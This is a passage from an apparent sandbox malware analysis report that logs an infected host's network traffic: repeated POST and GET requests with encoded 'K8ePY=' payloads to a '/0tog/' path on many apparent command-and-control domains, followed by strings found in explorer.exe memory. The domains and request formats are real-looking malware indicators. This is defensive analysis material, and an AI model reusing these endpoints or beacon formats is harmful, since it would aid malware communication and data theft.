K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.kuralike.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kuralike.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kuralike.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 71 48 4e 53 63 6a 73 38 57 66 4a 50 66 68 5a 52 76 33 66 75 61 56 52 48 44 43 39 59 58 79 46 46 28 73 4d 45 6b 66 79 70 58 44 31 61 55 47 34 58 6e 6e 56 50 65 4a 28 73 42 31 75 76 49 33 37 4b 71 49 75 54 54 2d 54 32 7e 79 49 48 34 62 39 47 54 66 4c 49 5a 69 6d 4d 44 34 41 50 43 31 4a 4b 6f 38 69 76 61 33 48 59 59 4d 61 4d 4f 57 7a 38 4d 58 6a 34 33 54 50 49 72 43 7e 72 69 69 53 63 39 71 55 77 77 68 4c 52 59 34 74 32 67 37 44 49 34 4f 48 66 52 65 35 47 43 32 64 61 76 73 63 6e 61 5f 42 7a 75 6b 30 56 6b 6a 70 37 52 62 7e 69 37 2d 6e 55 38 69 33 73 34 4d 30 32 54 4c 6c 30 43 70 30 65 59 73 71 71 56 67 4d 70 63 44 4a 66 6c 4e 7a 51 31 7a 6b 34 6b 79 37 48 38 47 33 69 34 54 70 73 36 76 4a 30 64 43 66 56 69 74 7e 65 76 68 64 7a 64 52 73 43 31 53 67 70 68 6f 30 70 44 78 4c 55 43 44 4e 4f 39 37 59 6a 71 56 6e 46 4f 66 45 45 53 70 74 49 62 5a 37 56 39 69 38 78 58 77 58 70 4d 34 31 5a 72 49 35 6a 6e 54 79 71 38 6b 7a 5a 48 74 77 46 4e 66 39 5a 49 43 78 63 4b 63 71 6e 73 46 63 71 6a 41 57 2d 33 73 53 6c 72 4e 65 49 6f 35 54 58 70 55 37 57 79 70 28 35 4c 61 28 42 43 55 53 70 64 6d 6e 44 51 72 70 5f 7a 69 69 5a 44 73 64 75 46 39 6a 61 76 43 36 70 78 59 44 44 77 30 59 7a 5a 63 54 49 28 78 46 31 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cdershoushichang.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cdershoushichang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cdershoushichang.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 7a 75 38 35 2d 54 49 63 49 32 61 63 49 47 32 37 33 37 31 55 74 44 46 63 46 36 79 76 65 5a 5a 61 36 4f 5f 42 61 46 4b 43 30 4c 31 34 45 4e 4e 6d 55 50 72 6e 72 28 62 42 52 7a 71 52 50 38 49 7e 34 63 66 66 6e 54 33 52 55 65 71 69 4c 42 6d 58 46 39 55 44 41 50 4d 36 68 51 63 33 76 39 43 6f 6e 51 31 5a 66 4d 49 6b 6d 6a 64 36 77 30 42 56 58 78 79 4f 38 4b 5f 65 71 4d 55 28 42 44 73 67 78 75 6e 5a 33 36 55 50 37 69 39 76 45 70 66 46 76 6c 6d 6a 54 7a 48 6b 7a 70 46 39 6b 45 77 57 43 48 36 48 58 62 66 69 31 32 78 76 49 59 74 38 4a 78 52 44 54 75 37 54 78 69 45 48 55 6e 58 34 4d 32 43 79 4a 50 62 7e 72 62 37 39 30 39 35 74 4a 52 7a 34 31 64 46 4f 62 28 71 42 71 75 66 32 6d 53 49 34 51 79 72 79 65 31 47 28 35 33 6a 65 68 49 7a 35 63 47 44 36 37 6c 67 38 37 38 62 64 6a 55 4d 42 5f 35 36 69 74 66 35 37 35 47 66 67 64 57 69 6f 5f 7e 48 69 31 67 35 59 34 78 58 67 62 72 4f 54 35 33 6d 71 36 77 46 56 79 54 58 70 31 30 39 42 41 4c 7a 43 44 65 55 57 49 79 38 54 36 48 53 41 2d 48 4a 74 79 6a 79 35 45 51 6f 62 46 4c 67 31 4b 56 6e 78 41 63 72 32 51 39 51 4a 49 47 6c 76 57 78 4d 72 54 73 73 35 71 56 37 69 65 57 4b 34 4b 73 35 6d 78 4e 57 70 30 78 65 35 6c 77 41 56 58 74 6d 4c 73 6e 4d 48 6b 6a 5f 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 4a 48 4a 55 79 77 32 39 35 36 6c 5a 70 67 4a 54 71 5a 6b 4f 54 5f 70 43 73 62 4f 75 7e 76 61 30 71 64 42 62 28 7a 55 44 47 36 6d 65 69 57 31 5f 38 5a 41 78 39 74 64 62 4e 34 6e 6b 6d 68 6d 4a 44 4b 58 37 66 50 37 78 70 68 52 69 41 57 52 36 65 56 74 32 33 37 42 67 69 34 76 66 54 37 7a 47 4c 74 6f 74 73 4e 54 52 7e 6d 4f 55 4e 63 73 4f 68 4c 78 53 35 59 36 70 28 74 4d 53 33 63 66 2d 4a 52 44 59 58 68 68 74 71 4a 54 48 4a 6d 48 6e 6b 6d 6a 4f 37 41 7e 69 75 64 71 79 67 6a 28 78 47 6d 7e 30 46 46 41 61 71 48 51 4b 74 4b 38 36 61 4d 55 75 62 33 56 37 44 44 64 62 43 61 44 55 79 41 63 6c 38 2d 58 6d 36 7a 53 46 68 79 62 44 50 41 48 6b 41 52 45 6a 78 59 4d 4d 55 61 61 32 6d 49 5a 67 4b 79 4e 78 65 6c 36 43 6f 66 42 31 4d 48 57 63 70 5a 30 4c 50 51 75 4d 39 51 52 78 43 57 32 52 50 75 43 62 33 62 7a 66 56 56 62 64 54 39 6b 32 7a 73 6a 59 54 7a 39 43 5a 41 46 62 41 6f 53 41 71 6a 5a 59 6c 66 52 50 45 6d 75 76 4f 4e 44 34 6d 7a 37 71 68 5f 4c 43 33 62 66 6a 7a 6b 75 50 59 74 6f 34 73 52 53 7a 79 5a 4c 42 63 32 49 33 77 36 57 2d 57 5f 4b 5f 6e 78 53 36 6a 30 6a 70 4a 44 4e 44 54 74 4d 39 57 34 42 7a 6d 6a 72 43 57 77 43 37 69 47 59 49 77 5a 49 34 54 42 50 5f 72 51 50 69 72 31 44 5a 64 75 6e 73 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=JHJUyw2956lZpgJTqZkOT_pCsbOu~va0qdBb(zUDG6meiW1_8ZAx9tdbN4nkmhmJDKX7fP7xphRiAWR6eVt237Bgi4vfT7zGLtotsNTR~mOUNcsOhLxS5Y6p(tMS3cf-JRDYXhhtqJTHJmHnkmjO7A~iudqygj(xGm~0FFAaqHQKtK86aMUub3V7DDdbCaDUyAcl8-Xm6zSFhybDPAHkAREjxYMMUaa2mIZgKyNxel6CofB1MHWcpZ0LPQuM9QRxCW2RPuCb3bzfVVbdT9k2zsjYTz9CZAFbAoSAqjZYlfRPEmuvOND4mz7qh_LC3bfjzkuPYto4sRSzyZLBc2I3w6W-W_K_nxS6j0jpJDNDTtM9W4BzmjrCWwC7iGYIwZI4TBP_rQPir1DZdunsyQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6f 64 6a 79 4d 6d 76 72 6f 6c 48 71 30 71 53 54 4a 63 75 37 58 39 62 38 6d 45 6c 72 72 73 58 48 48 44 69 35 76 50 61 33 33 38 6d 61 5a 4f 79 68 58 38 32 4f 6e 51 6e 5a 62 66 4b 71 59 38 4e 76 57 38 69 61 41 7a 79 70 33 5a 4f 44 76 57 47 47 66 5a 62 33 7e 58 47 41 52 64 69 59 56 76 39 36 58 4f 42 31 69 68 67 67 65 38 68 6a 35 4c 37 4d 32 6d 43 49 32 74 45 51 64 4b 4f 70 6e 7a 4f 34 69 44 79 49 4a 52 64 52 47 51 4a 5a 7a 6d 68 72 65 33 50 4a 46 53 46 41 6f 35 58 65 6d 50 62 4b 6a 32 36 5f 69 73 50 4c 6a 6a 63 6c 78 7a 6c 36 52 37 77 4f 4e 6a 79 31 47 78 50 67 76 62 69 77 44 50 61 47 41 4b 34 43 61 5f 47 55 37 75 42 41 41 36 7e 6e 41 76 69 48 6e 47 33 49 6b 33 4d 71 7a 77 62 6b 77 44 6d 39 37 54 33 39 34 50 28 47 48 70 52 42 78 70 56 71 71 73 73 34 55 4c 57 32 42 57 64 52 44 62 53 2d 76 7a 33 6d 63 6d 56 46 38 61 61 67 78 31 58 69 4a 54 42 5a 72 78 31 6e 75 7a 6b 5f 64 68 4f 4e 35 6b 6b 2d 51 46 57 76 73 2d 36 43 59 45 6b 58 71 47 54 66 64 4a 42 6e 67 63 70 6a 37 46 4e 5f 67 70 4e 67 5a 6b 61 49 4d 70 37 56 34 5a 72 48 30 4b 41 64 78 63 51 2d 42 58 41 77 6d 5a 51 6e 59 6e 75 35 5a 55 49 75 28 42 32 59 33 74 48 65 52 72 66 77 58 32 4b 61 32 31 28 76 6d 33 72 51 66 70 30 6d 72 34 61 6c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=odjyMmvrolHq0qSTJcu7X9b8mElrrsXHHDi5vPa338maZOyhX82OnQnZbfKqY8NvW8iaAzyp3ZODvWGGfZb3~XGARdiYVv96XOB1ihgge8hj5L7M2mCI2tEQdKOpnzO4iDyIJRdRGQJZzmhre3PJFSFAo5XemPbKj26_isPLjjclxzl6R7wONjy1GxPgvbiwDPaGAK4Ca_GU7uBAA6~nAviHnG3Ik3MqzwbkwDm97T394P(GHpRBxpVqqss4ULW2BWdRDbS-vz3mcmVF8aagx1XiJTBZrx1nuzk_dhON5kk-QFWvs-6CYEkXqGTfdJBngcpj7FN_gpNgZkaIMp7V4ZrH0KAdxcQ-BXAwmZQnYnu5ZUIu(B2Y3tHeRrfwX2Ka21(vm3rQfp0mr4alDQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 74 77 7e 38 57 64 4b 48 5a 4c 38 45 73 31 6e 34 6a 74 6a 4a 38 35 4c 35 70 72 37 63 7e 50 38 59 7a 35 65 54 72 41 70 72 62 59 6c 48 68 61 50 39 4c 56 42 51 30 4b 78 75 74 59 79 54 4d 2d 42 35 4c 7a 63 75 68 34 62 31 69 31 45 64 4d 6f 70 6e 69 2d 68 59 65 36 57 76 6d 72 5a 70 71 38 45 56 42 42 53 6f 6f 41 51 64 7e 53 6a 43 4d 47 63 52 57 50 52 53 6f 48 63 49 4d 2d 39 76 54 31 41 58 4e 45 43 7a 47 5f 33 4f 6d 36 4b 5f 45 36 74 6e 42 66 31 6e 67 76 61 75 69 63 6d 46 7a 72 72 65 41 70 78 31 69 74 6a 63 78 44 31 74 7e 6f 58 66 65 61 6d 4b 6f 5f 4c 4b 64 55 45 5a 6d 43 73 6f 79 57 45 34 66 4e 46 5f 63 68 28 35 59 44 48 61 50 58 4c 75 32 7a 68 38 76 37 63 34 59 2d 61 64 45 58 4b 6f 57 67 45 56 4d 33 4f 4c 6b 69 67 42 79 4d 5a 52 53 52 6f 74 6b 42 34 55 6d 41 43 64 51 2d 55 61 73 77 69 34 7a 62 36 6d 77 44 46 38 6e 54 6b 70 77 37 71 43 56 79 48 51 39 63 52 30 28 50 41 31 6e 79 6b 76 64 53 6a 5f 41 45 69 79 79 74 52 64 4b 59 41 65 44 46 48 4b 54 66 51 6d 4d 53 42 5f 62 55 72 76 76 50 43 33 79 35 46 74 41 6d 57 76 36 5f 54 78 37 7a 65 70 76 6c 68 61 61 30 4a 4e 6f 30 36 2d 79 62 31 68 50 48 75 43 48 49 79 56 73 77 65 62 32 5a 4d 48 79 77 78 73 67 64 34 63 33 6a 37 31 41 61 62 5a 45 49 5a 54 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=tw~8WdKHZL8Es1n4jtjJ85L5pr7c~P8Yz5eTrAprbYlHhaP9LVBQ0KxutYyTM-B5Lzcuh4b1i1EdMopni-hYe6WvmrZpq8EVBBSooAQd~SjCMGcRWPRSoHcIM-9vT1AXNECzG_3Om6K_E6tnBf1ngvauicmFzrreApx1itjcxD1t~oXfeamKo_LKdUEZmCsoyWE4fNF_ch(5YDHaPXLu2zh8v7c4Y-adEXKoWgEVM3OLkigByMZRSRotkB4UmACdQ-Uaswi4zb6mwDF8nTkpw7qCVyHQ9cR0(PA1nykvdSj_AEiyytRdKYAeDFHKTfQmMSB_bUrvvPC3y5FtAmWv6_Tx7zepvlhaa0JNo06-yb1hPHuCHIyVsweb2ZMHywxsgd4c3j71AabZEIZTuA).
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.smileyefero.com
Source: unknown HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Frame-Options: SAMEORIGINDate: Wed, 16 Sep 2020 07:14:45 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
